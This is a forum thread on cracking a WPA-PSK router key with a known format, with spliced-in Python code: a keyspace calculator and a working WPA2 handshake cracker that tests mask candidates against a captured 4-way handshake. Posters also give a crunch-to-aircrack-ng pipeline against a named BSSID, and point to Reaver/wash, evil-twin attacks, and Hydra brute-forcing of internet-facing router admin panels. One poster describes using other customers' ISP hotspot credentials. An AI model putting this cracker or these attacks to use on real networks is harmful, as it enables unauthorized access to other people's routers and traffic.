Cracking WPA-PSK with known password structure


sil3nce

So I know that the router generates random passwords in this structure:

xxxx-xxxx-xxxx

It uses lowercase alphanumeric characters only and includes the dashes, but no other special characters. I've been reading about generating rainbow tables, but all the options include too much, or won't allow me to generate 12-character-long passwords. But I don't know if I totally understand the process yet, I'm still reading.

Does anyone know a good way of generating either a plaintext dictionary or rainbow tables that fit this specific format only? I want to create a dictionary that includes all possible combinations for this format. Correct me if I'm wrong, but there should be:

62^12 = 3,226,266,762,397,899,821,056 possible combinations?

This is for my personal TP-Link router that I bought. I noticed this default password formatting and want to see if I can generate a customized table for it.

Really appreciate any advice or input. :happy:


TL;DR - Don't bother with brute-forcing. Here's why:

Your 62^12 is an absolute worst-case scenario, but we can improve upon it.

Each combination will have at least 1 of each type of character. That makes it 24*24*10*(62^9), which reduces your keyspace to a mere 77,973,618,506,478,059,520 or roughly 1/40th of the worst-case original.

Let's take it one step further and say that a valid key will have not 1 but 2 of each type of character at a minimum. That also implies that no type of character will appear more than 8 times which seems fair. With that you get 24*24*10*24*24*10*(62^6) or 1,884,495,496,111,718,400. This is 0.06% of your original keyspace. A significant reduction I would say.

Going by that last number, let's assume for a minute that, using rainbow tables and what not, you can check a single key combination in 1 nanosecond. To get the amount of time needed to check full keyspace you divide the number by 86400000000 to get the amount of days. That comes to roughly 21811290 days or 59756 years! You would need to get 1000 machines capable of computing a key within 1 nanosecond (which I hope I don't have to explain would be a feat in and of itself) just to break that one key within your own lifetime.

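The keyspace arithmetic in the post above, turned into a small calculator. This is an added example for the thread, not code from any of the posters: it counts candidates for a password mask such as xxxx-xxxx-xxxx (dashes are literals) and converts the count into cracking time at whatever guess rate you assume. 'x' is the thread's own placeholder for the lowercase alphanumeric class the original poster describes; the other class letters follow the hashcat ?l/?u/?d/?a convention so the same function also covers the 62^12 worst case. The guess rates passed in are assumptions, not measurements.

```python
"""Keyspace and brute-force time for a fixed-format pre-shared key.

Added example for this thread, not code from the original posts. Any guess
rate or deadline you pass in is an assumption you are making, not a fact
about real hardware.
"""
import math

LOWER = "abcdefghijklmnopqrstuvwxyz"
UPPER = LOWER.upper()
DIGITS = "0123456789"

# Character classes a mask may use; any other character (e.g. '-') is literal.
CLASSES = {
    "x": LOWER + DIGITS,          # lowercase alphanumeric, as the original poster describes
    "l": LOWER,
    "u": UPPER,
    "d": DIGITS,
    "a": LOWER + UPPER + DIGITS,  # the 62-character alphabet behind 62^12
}

SECONDS_PER_DAY = 86_400
SECONDS_PER_YEAR = 365 * SECONDS_PER_DAY


def keyspace(mask: str) -> int:
    """Number of candidates matching the mask (a literal contributes exactly one choice)."""
    total = 1
    for ch in mask:
        total *= len(CLASSES[ch]) if ch in CLASSES else 1
    return total


def years_to_exhaust(mask: str, guesses_per_second: float) -> float:
    """Worst case: every candidate in the keyspace is tried."""
    return keyspace(mask) / guesses_per_second / SECONDS_PER_YEAR


def expected_years(mask: str, guesses_per_second: float) -> float:
    """Average case for a uniformly random key: half the keyspace is tried."""
    return years_to_exhaust(mask, guesses_per_second) / 2


def machines_for_deadline(mask: str, guesses_per_second_per_machine: float,
                          deadline_years: float) -> int:
    """Machines at the given per-machine rate needed to exhaust the keyspace by the deadline."""
    budget = guesses_per_second_per_machine * deadline_years * SECONDS_PER_YEAR
    return math.ceil(keyspace(mask) / budget)


def report(mask: str, guesses_per_second: float) -> str:
    """One-line summary for a mask at an assumed rate."""
    return (f"{mask}: {keyspace(mask):,} candidates, "
            f"{years_to_exhaust(mask, guesses_per_second):,.0f} years to exhaust "
            f"at {guesses_per_second:,.0f} guesses/s")


if __name__ == "__main__":
    # The thread's format as described (lowercase alphanumeric, dashes literal)
    # next to the 62^12 figure the original poster computed.
    for m in ("xxxx-xxxx-xxxx", "aaaaaaaaaaaa"):
        print(report(m, 1e9))   # 1e9 guesses/s is the post's "1 nanosecond per key" assumption
    print(machines_for_deadline("aaaaaaaaaaaa", 1e9, 80), "machines for 80 years")
```

The literal handling matters for the question asked: the dashes in xxxx-xxxx-xxxx are fixed positions, so they add nothing to the keyspace, and the count is driven entirely by the twelve variable characters.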

Guest spazi

I once tried to use crunch to compute a wordlist with all possible WiFi passwords.

It came to around 1.5 petabytes.
Simply, it's not worth it.
It's easier to hack the admin panel of the router remotely and try to extract the wifi password from there.


And it'll be cheaper and faster to pay someone to break into the building in question and replace the router with your own that you have the password for.


I was afraid that would be the answer. It would be really cheap to replace it with a router I know the password to, because it's my router :P However, these routers are as common as flies, so if I wanted to get into someone else's, that would be a very clever and 007 kind of solution.

> I once tried to use crunch to compute a wordlist with all possible WiFi passwords.
>
> It came to around 1.5 petabytes.
> Simply, it's not worth it.
> It's easier to hack the admin panel of the router remotely and try to extract the wifi password from there.

I'm very interested in this. I've never thought about hacking the admin panel when I wasn't already connected. How would I go about doing that? If I'm not connected, then I can't just enter the gateway via HTTP. I don't necessarily need a tutorial, but maybe a few bread crumbs to follow :P

Thanks guys!!!!


Because routers are (by necessity) internet-facing devices, the external IP address is (usually) pingable.

Most of the time, the router will accept HTTP requests over port 80 from any connection. This means that if you know the IP address of the router (usually static for a business or anything corporate and dynamic for a home connection, but there are always exceptions), you can browse to the router's management page. From there something like Hydra might be able to help you crack the login, or maybe the default login still works, which happens a lot of the time.


And I assumed that since the router has one internet-facing side and one lan-facing side, the management service would be active only on the lan-facing side...

What I'm interested in is the routers they have here where there's a small amount of bandwidth allotted for other customers of the same ISP that would allow them to use that small amount to do their internetting via YOUR router. It's all perfectly legit, but now there's effectively two lan-facing sides, and what I wonder is if the second lan-facing side is in fact unable to connect to the management service...


You'd think that'd be the case, wouldn't you? It seems common sense.

Well, here in the UK, BT run such a service. The idea is you sign up to "BT Openzone" and it broadcasts a second open SSID from your router. If someone tries to connect to it, they are sent to a captive portal where you have to log in with your BT account to get any internet access. It's pretty decently set up actually, you can't even DNS tunnel out of it.

The whole second subnet is firewalled in such a way that you can't get anywhere near the management service, at least in the way that BT have it set up. It would be interesting to hear about how other providers go about it.


Over here the second SSID is either "Ziggo" or "UPC" (the names of the 2 major Dutch cable internet providers; combined they cover approx. 90% of the total country) and the basic setup is that to log in, you provide some unique credentials via WPA-EAP which get authenticated via a RADIUS server at the ISP's side. It's already been demonstrated that the authentication process chosen makes it easy to sniff your credentials during connect, but they said they weren't particularly concerned about it and if need be they could adjust things, but for the time being they won't. And that was over 18 months ago.

So I'm with Ziggo, my sister is with UPC, and my whole family has wifi internet access in roughly 90% of the Netherlands in a fairly legit manner (at least to the point where they can't prove you're abusing it since you are in fact using valid credentials - just maybe not yours, but good luck proving the opposite while you're sitting on a bench in a park somewhere near a residential area).


> And I assumed that since the router has one internet-facing side and one lan-facing side, the management service would be active only on the lan-facing side...
>
> What I'm interested in is the routers they have here where there's a small amount of bandwidth allotted for other customers of the same ISP that would allow them to use that small amount to do their internetting via YOUR router. It's all perfectly legit, but now there's effectively two lan-facing sides, and what I wonder is if the second lan-facing side is in fact unable to connect to the management service...

So if I understand this correctly, you can connect to your own router remotely and use the bandwidth through there? Like a VPN? Don't you need a net connection to get to your router? I'm from the US, living in China, and I'm not familiar with that. Unless I'm just not quite sure what you're talking about. :P

I'll try accessing the router via the external IP when I have a chance, but if I cannot access the management and I can't brute force my way in by capturing IVs, then what other options are there? I mean it's a super cheap junkie router. It can't be unhackable. It seems too easy for the management menu to be accessible from the outside, when the remote management is off by default.


I do believe you're misunderstanding.

Think of the router as a box with 1 cloud on one side and 2 clouds on the other. The router is connected to the single cloud. That cloud is the internet, so this is the internet-facing side of your router.

The router is also connected to the other 2 clouds, one is your wired lan and the other is your wireless lan. Both of them constitute the lan-facing side(s) of your router.

Depending on your router you can have 1 or more wireless lans (multiple SSIDs being broadcast, as is the case with the Ziggo/UPC SSIDs which are separate from my regular SSID), so if I were to draw this for the router I possess, it would have the internet cloud on one side, and on the other there are 3 clouds - wired, wireless and ISP public wireless. Of the total bandwidth available to me, a limited amount is potentially available to the ISP public wireless cloud, but all that remains is available to the other 2 clouds. In my particular case, unless the general public manages to grow wings (I'm on the 5th floor of an apartment building) I get effectively all available bandwidth all to myself AND I can still use that limited amount on other people's routers when I'm out and about.

The point I was making in the section that you quoted is that the router itself runs a management webservice. This webservice should most certainly never be made available to the internet cloud - there's no reason in hell for the internet at large to tweak the settings of your router. The other side is different. The webservice will in pretty much all instances be available to the wired lan. Depending on your router it may or may not allow access to the webservice on the private wireless side of it. And it most certainly should not provide access to the webservice from the ISP public wireless cloud since, like with the internet cloud, all people that need to come in through there have no ownership rights to my router.

The question I'm asking aloud is if they did in fact restrict access to the webservice from the ISP public wireless sufficiently.

I say "sufficiently" because I'm sure they did in some way, or otherwise it would've been found already, given that they've already shown that the username and password can be easily acquired from people with their current authentication scheme. I'm sure such low-hanging fruit would've been in their scope as well.


OH I understand now! So essentially all routers from the ISP broadcast to the public and create a public wifi network that anyone can access? Right? If so, that's fantastic! There is nothing worse than needing wifi and having no open networks anywhere nearby.

You're right. The remote management never needs to be active. Unless I suppose I need to fix my grandmother's wireless from China :P.

Were I you, I would be very interested in the holes made available by this extra "cloud". But I'm still not sold that a crappy 15RMB router is unhackable. But I'm wondering if the only access is through a social hole. Either a trojan or physical access. My goal is to access this router without either. Especially since social engineering is rather silly when I'm attacking myself...


That's pretty much it except for the fact that this public wifi network is only accessible by other customers of the same ISP, but given their abundance it's hardly a limitation.

The problem you're facing isn't so much that the 15RMB router, being the pathetic lump of craptastic plastic with a few cheap chips on it that it is, is of sufficient quality to withstand attack (any hammer can prove otherwise) but rather that the fundamental technology implemented by the device (and required to be implemented to work on the network to begin with) has thus far proven to be sound. Unless additional advances are made, the inherent protections provided by the technology suffice. You could take a look at the chips they use to implement the technology, see if you can find flaws in the implementation of the networking stack. After all, to get a protocol going there needs to be an exchange of information, so try to fiddle with the bits in your packets and see if the router responds in a peculiar way to them.

In other words, don't attack the standard WPA-PSK algorithms but instead go for the blocks it has been built upon.


You say that there's no reason in hell why the management interface should be open to the internet, but a quick search on Shodan shows otherwise! :/ I never understood why all ISPs don't automatically turn it off. The problem is that easily 80-90% of users don't even know that the management page exists!

All of the routers I've ever owned (BTHomeHub up to version 3, then Asus RT-N66U currently) have ALL had the management interface open on port 80 to the wide web. BT's routers are crap, so I wasn't really surprised, but Asus are (a bit) more respected!

The worst bit was that BT didn't even let you turn it off! You had to forward port 80 to another device on the network to fix it!


> You could take a look at the chips they use to implement the technology, see if you can find flaws in the implementation of the networking stack. After all, to get a protocol going there needs to be an exchange of information, so try to fiddle with the bits in your packets and see if the router responds in a peculiar way to them.
>
> In other words, don't attack the standard WPA-PSK algorithms but instead go for the blocks it has been built upon.

I'm sure you're right, but I'm still too much of a noob to know exactly what I would do to probe. If I can't crack the WPA algorithm, it seems like the router wouldn't communicate. I imagine there is something I'm missing. I won't ask for a tutorial :P but maybe a tip on where to direct my research. Looking at the chipset for vulnerabilities. But how do I probe? Wireshark would just watch, right? Nmap, ping, netcat, etc. can't communicate unless I'm connected, right? Or is the approach from the public side?


Most people are only interested in the router because it's the gateway to the actual goal - either the LAN or the internet, typically the latter (which, I might add, is rather boring). To get there the router has to allow you pass-through rights. You get these by informing the router who you are. This implies communication. What I'm suggesting is that you take a good hard look at this communication.

Figure out what the full protocol spec says about the packets that get sent here. What do they contain? What happens when you vary it a bit. What happens when you send the packets in the wrong order? What happens when you send garbage? Are there fields in the packet that signify the length of something? What happens when you play around with those lengths? Think Heartbleed bug here.

Wireshark is a decent tool to look into this as it will show you bit-level packet data including headers and what not. But remember that to really dive into this you need to have a solid grasp on the spec (as in you need to know that byte 13 bit 4 is either 0 or 1 depending on BLA), so look that up first and start reading so you know what you can expect. Have Wireshark capture a successful exchange to see that it all works as expected. You may have to tell Wireshark in some way what the wifi password is so it can decode the traffic, as I suspect a fair chunk of it will be encrypted.

Nmap can identify the type of host on the network by playing tricks with the bits in the various packets. Can you spot similar differences on wireless chipsets as well? I don't know if it's been investigated yet, but if it has I haven't heard about it.


  • 1 month later...

I have a suggestion....

While I was researching how to break a WPA key I have found a few ways....

The first way is you can try to brute force it, but as we all know that won't work unless you have a few hundred years to blow.

The second way would be with Craig Heffner's Reaver, which is very useful if your router has WPS enabled, and it is built right into BackTrack 5.

You can also use wash in BT5 to check if any access points around you have WPS enabled; this was also created by Craig Heffner.

I believe the command is wash -i <interface> -C (put your monitor interface there, e.g. mon0).

The third way is using a Evil Twin Attack on the router https://www.youtube.com/watch?v=LwEjYL6Eoro I personally like Cris Haralson's tutorial on youtube

The last way is a way to brute-force the pass key, but it is a lot simpler and a ... little bit ... more practical than the normal way:

http://security.stackexchange.com/questions/35278/bruteforce-on-10-characters-length-wpa2-password

The part of the post that I found to be very interesting is here...

> I'm currently developing similar technologies. Aircrack-ng really is brilliant, although it does have some limitations.
>
> I have also attempted a brute force on my own wifi using crunch to generate passwords, and my findings are as such:
>
>   • You can pipe crunch directly into Aircrack-ng to eliminate the need to create a .txt file and use it simultaneously, saving you processing power to perform calculations. The syntax for this method in bash is as such:
>
> Here you can see the standard format for piping into aircrack-ng and some simple options.
>
> ./crunch <max> <min> (stick to 8 for now) <options> (a charset such as abcd1234.., or -t passwo@@@ to give a partial password) | aircrack-ng -b [bssid] -w - [.cap file]
>
> Here is a working copy you can paste into a terminal (below); I'll talk you through it a little.
>
> From left to right:
>
>   1. The name of the command, crunch; if this doesn't work straight away, force execution by starting with ./crunch.
>   2. 8 8 is the max and min chars you're going to need, as I'm sure you already know.
>   3. Then a pipe symbol. This feeds the output directly into the file that aircrack-ng is going to use as a dictionary.
>   4. Fill in the BSSID as you already know how to do in this format once your handshake has been established.
>
> WORKING COPY:
>
> crunch 8 8 1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ -t 97KQA@@@ | aircrack-ng -b 78:54:2E:28:E7:86 -w - thehak-01.cap
>
> THE PROBLEM WITH THIS METHOD:
>
> Using a permutation equation and using an expected 1000 combinations per second (this is what my actual output is), I have calculated that testing each of the generated combinations will take 77.8 years.

I hope this helped you!

...Sorry if any of these methods were already mentioned I didn't get a chance to read all of them

Edited by I_NEED_HELP
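What the crunch | aircrack-ng pipeline above actually does per candidate, and why the thread's keyspace numbers translate into years: each guess is a PBKDF2 run of 4096 HMAC-SHA1 iterations to get the PMK, a PRF to derive the PTK, and an HMAC over the captured EAPOL message 2 to compare the MIC. This is an added example for the thread; it is not code from the posters, from aircrack-ng or from crunch, and it follows the IEEE 802.11i derivation rather than any tool's internals. The SSID "TP-LINK_DEMO", the MAC addresses, the nonces and the "captured" message 2 are constructed here for the demo, not real captures, and the demo mask is narrowed to the last character so that only 36 candidates are tried.

```python
"""Checking WPA2-PSK candidates against a 4-way handshake.

Added example for this thread, not code from the original posts or from
aircrack-ng. Everything under make_demo_handshake() is constructed test
data, not a real capture.
"""
from __future__ import annotations

import hashlib
import hmac
import itertools
import struct
from typing import Iterable, Iterator, Optional

LOWER_ALNUM = "abcdefghijklmnopqrstuvwxyz0123456789"  # the poster's "lowercase alphanumeric"
MIC_OFFSET = 81  # 4-byte 802.1X header + 77 bytes of EAPOL-Key descriptor before the MIC field


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).

    These 4096 iterations are the cost of every single guess; the dictionary
    or mask only decides how many times this has to run.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    for i in itertools.count():
        if len(out) >= nbytes:
            break
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK for CCMP is 384 bits: KCK (16) | KEK (16) | TK (16). Only the KCK is needed to check a MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with the MIC field zeroed)[:16]."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, mic: bytes = b"\x00" * 16, key_data: bytes = b"") -> bytes:
    """Minimal EAPOL-Key message 2 (the supplicant's reply that carries SNonce and the MIC)."""
    body = struct.pack(">BHH", 2, 0x010A, 16)                    # RSN descriptor; key info: v2, pairwise, MIC set
    body += struct.pack(">Q", 1)                                  # replay counter
    body += snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8    # key nonce, key IV, key RSC, key ID
    body += mic + struct.pack(">H", len(key_data)) + key_data
    return struct.pack(">BBH", 2, 3, len(body)) + body            # 802.1X: version 2, type 3 (EAPOL-Key)


def check_candidate(passphrase: str, ssid: str, aa: bytes, spa: bytes,
                    anonce: bytes, snonce: bytes, eapol: bytes) -> bool:
    """True if the candidate reproduces the MIC carried in the captured message 2."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    return hmac.compare_digest(eapol_mic(kck, eapol), eapol[MIC_OFFSET:MIC_OFFSET + 16])


def mask_candidates(mask: str, charset: str = LOWER_ALNUM) -> Iterator[str]:
    """Every string matching the mask: 'x' draws from charset, any other character is literal."""
    slots = [charset if ch == "x" else ch for ch in mask]
    for combo in itertools.product(*slots):
        yield "".join(combo)


def crack(handshake: dict, candidates: Iterable[str]) -> tuple[Optional[str], int]:
    """Try candidates in order; return (passphrase or None, number of PBKDF2 runs spent)."""
    tried = 0
    for cand in candidates:
        tried += 1
        if check_candidate(cand, **handshake):
            return cand, tried
    return None, tried


def make_demo_handshake(passphrase: str, ssid: str = "TP-LINK_DEMO") -> dict:
    """Constructed handshake: both sides' parameters plus a message 2 carrying a valid MIC."""
    aa = bytes.fromhex("001122334455")     # AP MAC, constructed for the demo
    spa = bytes.fromhex("66778899aabb")    # client MAC, constructed for the demo
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    mic = eapol_mic(kck, build_msg2(snonce))
    return dict(ssid=ssid, aa=aa, spa=spa, anonce=anonce, snonce=snonce,
                eapol=build_msg2(snonce, mic))


if __name__ == "__main__":
    hs = make_demo_handshake("ab12-cd34-ef56")
    # Pretend all but the last character is known, so only 36 candidates remain.
    print(crack(hs, mask_candidates("ab12-cd34-ef5x")))
```

The full format would be mask_candidates("xxxx-xxxx-xxxx"), which is 36^12 candidates, each costing one pbkdf2_hmac call; that per-guess cost, not the size of the wordlist file, is what the 1.5-petabyte and 77.8-year figures in the thread are really about. For reference, the crunch invocation for the same format is crunch 14 14 abcdefghijklmnopqrstuvwxyz0123456789 -t @@@@-@@@@-@@@@, where each @ is replaced by a character from the given set and the dashes are kept literal.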
